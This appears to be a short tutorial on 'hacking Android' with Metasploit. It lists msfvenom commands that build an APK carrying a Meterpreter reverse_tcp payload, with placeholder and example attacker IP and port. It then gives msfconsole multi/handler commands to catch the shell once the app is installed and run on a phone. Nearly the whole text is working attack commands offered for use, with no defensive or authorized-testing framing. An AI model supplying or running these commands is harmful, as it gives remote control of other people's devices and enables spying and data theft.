In order to hack Android we need to create an application (.apk file) that contains embedded Meterpreter functionality as well as new functions unique to the Android version of Meterpreter. We will set up a listener (handler) on the attacking machine and then install this program onto the phone/tablet and execute it so the device performs a reverse connection to the attacking machine.
Creating The Android Meterpreter ApplicationÂ
msfvenom -p android/meterpreter/reverse_tcp LHOST=IP_Address LPORT=Port_Number R > /root/app_name.apk
i.e. msfvenom -p android/shell/reverse_tcp LHOST=192.168.1.11 LPORT=1234 R > /root/shell.apk
Starting The Listener (Handler)
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST IP_Address
set LPORT Port_Number
exploit